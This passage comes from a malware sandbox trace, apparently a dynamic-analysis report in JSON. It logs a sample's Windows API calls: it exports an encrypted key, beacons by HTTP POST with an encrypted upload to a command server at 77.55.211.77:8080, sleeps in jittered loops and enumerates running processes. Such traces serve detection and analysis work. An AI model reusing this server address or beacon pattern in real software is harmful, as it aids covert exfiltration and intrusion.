\\x14W_#?\\xe0{iDU)\\xda\\x06\\x1a\\xbf&YP\\x96\\xca\\xe95B\\x0c\\xbe:FPh$\\xb9\\xf5\\xa8\\x80\\x07\\xeb\\xe6qZ\\x19|>\\xf3\\x1b\\x13,P\\x01\\x85\\xae-\\xfbB\\x04\\xaf\\x86\\xaf\\x8b\\xf3*\\xb6\\xe7t\\x16\\xcc" + }, + { + "name": "Length", + "value": "624" + }, + { + "name": "Final", + "value": "1" + } + ], + "repeated": 0, + "id": 2344 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce1b83", + "parentcaller": "0x03ce11f8", + "category": "crypto", + "api": "CryptExportKey", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CryptKey", + "value": "0x04e240c0" + }, + { + "name": "Buffer", + "value": "\\x01\\x02\\x00\\x00\\x0ef\\x00\\x00\\x00\\xa4\\x00\\x00\\x85\\xdd\\x87\\x0e[\\xb4\\xf1\\xb4\\x18\\x80\\xc3;\\x95U\n\\x0cF\\x94\\xa9J\\xa7\\xd7Ue\\xdb\\xcb\\x1f\"`.\\x95n?`pT\\x8c\\x93\\xd0\\x0e\\x90; -]\r\\xdf\\xedO[\\x1b0\\x04\\xff4\\xb2\\xedX8\\xa6L\\xe5\\xabe\\x02,\\x8b\\x95D+r\\x19\\x01\\xa16\\x82 \\xafe\\xc8c\\xfa\n\\xef\\x0b\\x7f9\\x00\\x01\\xec\\x9f\\xb5?\\xb7\\xa0\\x91" + }, + { + "name": "BlobType", + "value": "1", + "pretty_value": "SIMPLEBLOB" + }, + { + "name": "Flags", + "value": "0x00000040" + }, + { + "name": "Length", + "value": "108" + } + ], + "repeated": 0, + "id": 2345 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce1c0a", + "parentcaller": "0x03ce11f8", + "category": "crypto", + "api": "CryptDestroyHash", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CryptHash", + "value": "0x04e249c0" + } + ], + "repeated": 0, + "id": 2346 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce235f", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "ObtainUserAgentString", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "UserAgent", + "value": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E)" + } + ], + "repeated": 0, + "id": 2347 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce2243", + "parentcaller": "0x03ce123a", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 4, + "id": 2348 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce2243", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "InternetOpenW", + "status": true, + "return": "0x00cc0004", + "arguments": [ + { + "name": "Agent", + "value": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E)" + }, + { + "name": "AccessType", + "value": "0x00000000" + }, + { + "name": "ProxyName", + "value": "" + }, + { + "name": "ProxyBypass", + "value": "" + }, + { + "name": "Flags", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 2349 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce21eb", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "InternetConnectW", + "status": true, + "return": "0x00cc0008", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x00cc0004" + }, + { + "name": "ServerName", + "value": "77.55.211.77" + }, + { + "name": "ServerPort", + "value": "8080" + }, + { + "name": "Username", + "value": "" + }, + { + "name": "Password", + "value": "" + }, + { + "name": "Service", + "value": "3" + }, + { + "name": "Flags", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 2350 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce219e", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "HttpOpenRequestW", + "status": true, + "return": "0x00cc000c", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x00cc0008" + }, + { + "name": "Path", + "value": "yFaW/" + }, + { + "name": "Flags", + "value": "0x844cc300" + }, + { + "name": "Referrer", + "value": "" + }, + { + "name": "Verb", + "value": "POST" + } + ], + "repeated": 0, + "id": 2351 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "9440", + "caller": "0x03ce22b8", + "parentcaller": "0x03ce123a", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 7, + "id": 2352 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "8196", + "caller": "0x73331eb3", + "parentcaller": "0x73331c87", + "category": "network", + "api": "WinHttpSetOption", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x0529ca78" + }, + { + "name": "Option", + "value": "0x0000002d" + }, + { + "name": "Buffer", + "value": "\\x90q*\\x05" + } + ], + "repeated": 0, + "id": 2353 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "8196", + "caller": "0x7334c060", + "parentcaller": "0x7334b989", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 2, + "id": 2354 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "6332", + "caller": "0x756b8c89", + "parentcaller": "0x739ecb7a", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004c8" + }, + { + "name": "Milliseconds", + "value": "18446744073709551615" + }, + { + "name": "Status", + "value": "Infinite" + } + ], + "repeated": 0, + "id": 2355 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "6332", + "caller": "0x770225b6", + "parentcaller": "0x77021fc0", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004dc" + } + ], + "repeated": 0, + "id": 2356 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "6332", + "caller": "0x770225b6", + "parentcaller": "0x77021fc0", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004e0" + } + ], + "repeated": 0, + "id": 2357 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "6332", + "caller": "0x756b8b4a", + "parentcaller": "0x73a35097", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004c4" + } + ], + "repeated": 0, + "id": 2358 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "6332", + "caller": "0x756b8b4a", + "parentcaller": "0x739f2629", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004d0" + } + ], + "repeated": 0, + "id": 2359 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "6332", + "caller": "0x756b8b4a", + "parentcaller": "0x73a350ec", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004c8" + } + ], + "repeated": 0, + "id": 2360 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "6332", + "caller": "0x770225b6", + "parentcaller": "0x770269b6", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000004f0" + } + ], + "repeated": 0, + "id": 2361 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "6332", + "caller": "0x7332ed40", + "parentcaller": "0x7332e70d", + "category": "network", + "api": "GetAddrInfoExW", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Name", + "value": "77.55.211.77" + }, + { + "name": "ServiceName", + "value": "" + } + ], + "repeated": 0, + "id": 2362 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "6332", + "caller": "0x7337e0ec", + "parentcaller": "0x7337e077", + "category": "network", + "api": "WSASocketW", + "status": true, + "return": "0x000004f0", + "arguments": [ + { + "name": "af", + "value": "2", + "pretty_value": "AF_INET" + }, + { + "name": "type", + "value": "1", + "pretty_value": "SOCK_STREAM" + }, + { + "name": "protocol", + "value": "6", + "pretty_value": "IPPROTO_TCP" + }, + { + "name": "socket", + "value": "1264" + } + ], + "repeated": 0, + "id": 2363 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "6332", + "caller": "0x76112466", + "parentcaller": "0x7337e84b", + "category": "filesystem", + "api": "NtSetInformationFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000004f0" + }, + { + "name": "HandleName", + "value": "\\Device\\Afd" + }, + { + "name": "FileInformationClass", + "value": "41", + "pretty_value": "FileIoStatusBlockRangeInformation" + }, + { + "name": "FileInformation", + "value": "\\x01\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2364 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "6332", + "caller": "0x7705727f", + "parentcaller": "0x77057096", + "category": "filesystem", + "api": "NtSetInformationFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000004f0" + }, + { + "name": "HandleName", + "value": "\\Device\\Afd" + }, + { + "name": "FileInformationClass", + "value": "30", + "pretty_value": "FileCompletionInformation" + }, + { + "name": "FileInformation", + "value": "T\\x00\\x00\\x00\\xb8u*\\x05" + } + ], + "repeated": 0, + "id": 2365 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "6332", + "caller": "0x7337e17b", + "parentcaller": "0x7337e077", + "category": "network", + "api": "bind", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1264" + }, + { + "name": "ip", + "value": "0.0.0.0" + }, + { + "name": "port", + "value": "0" + } + ], + "repeated": 0, + "id": 2366 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "6332", + "caller": "0x6db9ac5d", + "parentcaller": "0x7554234d", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000004f0" + }, + { + "name": "IoControlCode", + "value": "0x0001202f", + "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" + }, + { + "name": "InputBuffer", + "value": "" + }, + { + "name": "OutputBuffer", + "value": "\\x02\\x00\\xc4 \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2367 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "6332", + "caller": "0x7337e1b7", + "parentcaller": "0x7337e077", + "category": "network", + "api": "setsockopt", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1264" + }, + { + "name": "level", + "value": "0x00000006" + }, + { + "name": "optname", + "value": "0x00000001" + }, + { + "name": "optval", + "value": "\\x01\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2368 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "6332", + "caller": "0x6db8a714", + "parentcaller": "0x7553f4f1", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000004f0" + }, + { + "name": "IoControlCode", + "value": "0x000120bf", + "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" + }, + { + "name": "InputBuffer", + "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xe3\\xf3W\\x05\\x01\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "" + } + ], + "repeated": 0, + "id": 2369 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "6332", + "caller": "0x6db8a714", + "parentcaller": "0x7553f4f1", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x000004f0" + }, + { + "name": "IoControlCode", + "value": "0x000120bf", + "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" + }, + { + "name": "InputBuffer", + "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00\\x88\\xf3W\\x05\\x08\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "" + } + ], + "repeated": 0, + "id": 2370 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "6332", + "caller": "0x7337e233", + "parentcaller": "0x7337e077", + "category": "network", + "api": "setsockopt", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1264" + }, + { + "name": "level", + "value": "0x0000ffff" + }, + { + "name": "optname", + "value": "0x00001002" + }, + { + "name": "optval", + "value": "\\x00\\x00\\x04\\x00" + } + ], + "repeated": 0, + "id": 2371 + }, + { + "timestamp": "2025-03-07 22:35:28,391", + "thread_id": "6332", + "caller": "0x7337dc91", + "parentcaller": "0x7337db66", + "category": "network", + "api": "ConnectEx", + "status": false, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1264" + }, + { + "name": "SendBuffer", + "value": "" + }, + { + "name": "ip", + "value": "77.55.211.77" + }, + { + "name": "port", + "value": "8080" + } + ], + "repeated": 0, + "id": 2372 + }, + { + "timestamp": "2025-03-07 22:35:49,454", + "thread_id": "6332", + "caller": "0x7335afe3", + "parentcaller": "0x756dd613", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 3, + "id": 2373 + }, + { + "timestamp": "2025-03-07 22:35:49,454", + "thread_id": "6332", + "caller": "0x73389bd2", + "parentcaller": "0x7332eeb2", + "category": "network", + "api": "closesocket", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1264" + } + ], + "repeated": 0, + "id": 2374 + }, + { + "timestamp": "2025-03-07 22:35:49,454", + "thread_id": "6332", + "caller": "0x733cc064", + "parentcaller": "0x7337a91d", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 5, + "id": 2375 + }, + { + "timestamp": "2025-03-07 22:35:49,454", + "thread_id": "9440", + "caller": "0x03ce22b8", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "HttpSendRequestW", + "status": false, + "return": "0x00000000", + "arguments": [ + { + "name": "RequestHandle", + "value": "0x00cc000c" + }, + { + "name": "Headers", + "value": "Referer: http://77.55.211.77/yFaW/\r\nContent-Type: multipart/form-data; boundary=---------------------------519981774317483\r\n" + }, + { + "name": "PostData", + "value": "\r\n-----------------------------519981774317483\r\nContent-Disposition: form-data; name=\"jtaUfyAQnwu\"; filename=\"cyiGaCLDjWWKV\"\r\nContent-Type: application/octet-stream\r\n\r\n\\x91\\xa0\\xb7?\\xb5\\x9f\\xec\\x01\\x009\\x7f\\x0b\\xef\n\\xfac\\xc8e\\xaf \\x826\\xa1\\x01\\x19r+D\\x95\\x8b,\\x02e\\xab\\xe5L\\xa68X\\xed\\xb24\\xff\\x040\\x1b[O\\xed\\xdf\r]- ;\\x90\\x0e\\xd0\\x93\\x8cTp`?n\\x95.`\"\\x1f\\xcb\\xdbeU\\xd7\\xa7J\\xa9\\x94F\\x0c\nU\\x95;\\xc3\\x80\\x18" + } + ], + "repeated": 0, + "id": 2376 + }, + { + "timestamp": "2025-03-07 22:35:49,454", + "thread_id": "9440", + "caller": "0x03ce221c", + "parentcaller": "0x03ce123a", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 5, + "id": 2377 + }, + { + "timestamp": "2025-03-07 22:35:49,454", + "thread_id": "9440", + "caller": "0x03ce221c", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "InternetCloseHandle", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x00cc000c" + } + ], + "repeated": 0, + "id": 2378 + }, + { + "timestamp": "2025-03-07 22:35:49,454", + "thread_id": "9440", + "caller": "0x03ce227a", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "InternetCloseHandle", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x00cc0008" + } + ], + "repeated": 0, + "id": 2379 + }, + { + "timestamp": "2025-03-07 22:35:49,454", + "thread_id": "9440", + "caller": "0x03ce23c3", + "parentcaller": "0x03ce123a", + "category": "network", + "api": "InternetCloseHandle", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x00cc0004" + } + ], + "repeated": 0, + "id": 2380 + }, + { + "timestamp": "2025-03-07 22:35:49,454", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2381 + }, + { + "timestamp": "2025-03-07 22:35:49,454", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "215" + } + ], + "repeated": 0, + "id": 2382 + }, + { + "timestamp": "2025-03-07 22:35:49,672", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2383 + }, + { + "timestamp": "2025-03-07 22:35:49,672", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "273" + } + ], + "repeated": 0, + "id": 2384 + }, + { + "timestamp": "2025-03-07 22:35:49,954", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2385 + }, + { + "timestamp": "2025-03-07 22:35:49,954", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "235" + } + ], + "repeated": 0, + "id": 2386 + }, + { + "timestamp": "2025-03-07 22:35:50,204", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2387 + }, + { + "timestamp": "2025-03-07 22:35:50,204", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "165" + } + ], + "repeated": 0, + "id": 2388 + }, + { + "timestamp": "2025-03-07 22:35:50,375", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2389 + }, + { + "timestamp": "2025-03-07 22:35:50,375", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "176" + } + ], + "repeated": 0, + "id": 2390 + }, + { + "timestamp": "2025-03-07 22:35:50,563", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2391 + }, + { + "timestamp": "2025-03-07 22:35:50,563", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "204" + } + ], + "repeated": 0, + "id": 2392 + }, + { + "timestamp": "2025-03-07 22:35:50,782", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2393 + }, + { + "timestamp": "2025-03-07 22:35:50,782", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "263" + } + ], + "repeated": 0, + "id": 2394 + }, + { + "timestamp": "2025-03-07 22:35:51,047", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2395 + }, + { + "timestamp": "2025-03-07 22:35:51,047", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "208" + } + ], + "repeated": 0, + "id": 2396 + }, + { + "timestamp": "2025-03-07 22:35:51,266", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2397 + }, + { + "timestamp": "2025-03-07 22:35:51,266", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "267" + } + ], + "repeated": 0, + "id": 2398 + }, + { + "timestamp": "2025-03-07 22:35:51,547", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2399 + }, + { + "timestamp": "2025-03-07 22:35:51,547", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "228" + } + ], + "repeated": 0, + "id": 2400 + }, + { + "timestamp": "2025-03-07 22:35:51,782", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2401 + }, + { + "timestamp": "2025-03-07 22:35:51,782", + "thread_id": "9440", + "caller": "0x03ce6d3b", + "parentcaller": "0x03ce4176", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000320" + }, + { + "name": "Milliseconds", + "value": "303" + } + ], + "repeated": 0, + "id": 2402 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce36cc", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "CreateToolhelp32Snapshot", + "status": true, + "return": "0x000004ec", + "arguments": [ + { + "name": "Flags", + "value": "0x00000002", + "pretty_value": "TH32CS_SNAPPROCESS" + }, + { + "name": "ProcessId", + "value": "0" + } + ], + "repeated": 0, + "id": 2403 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32FirstW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "[System Process]" + }, + { + "name": "ProcessId", + "value": "0" + } + ], + "repeated": 0, + "id": 2404 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "System" + }, + { + "name": "ProcessId", + "value": "4" + } + ], + "repeated": 0, + "id": 2405 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "Registry" + }, + { + "name": "ProcessId", + "value": "92" + } + ], + "repeated": 0, + "id": 2406 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "smss.exe" + }, + { + "name": "ProcessId", + "value": "328" + } + ], + "repeated": 0, + "id": 2407 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "csrss.exe" + }, + { + "name": "ProcessId", + "value": "428" + } + ], + "repeated": 0, + "id": 2408 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "wininit.exe" + }, + { + "name": "ProcessId", + "value": "504" + } + ], + "repeated": 0, + "id": 2409 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "csrss.exe" + }, + { + "name": "ProcessId", + "value": "516" + } + ], + "repeated": 0, + "id": 2410 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "winlogon.exe" + }, + { + "name": "ProcessId", + "value": "600" + } + ], + "repeated": 0, + "id": 2411 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "services.exe" + }, + { + "name": "ProcessId", + "value": "640" + } + ], + "repeated": 0, + "id": 2412 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "lsass.exe" + }, + { + "name": "ProcessId", + "value": "660" + } + ], + "repeated": 0, + "id": 2413 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "fontdrvhost.exe" + }, + { + "name": "ProcessId", + "value": "752" + } + ], + "repeated": 0, + "id": 2414 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "fontdrvhost.exe" + }, + { + "name": "ProcessId", + "value": "760" + } + ], + "repeated": 0, + "id": 2415 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "768" + } + ], + "repeated": 0, + "id": 2416 + }, + { + "timestamp": "2025-03-07 22:35:52,094", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + 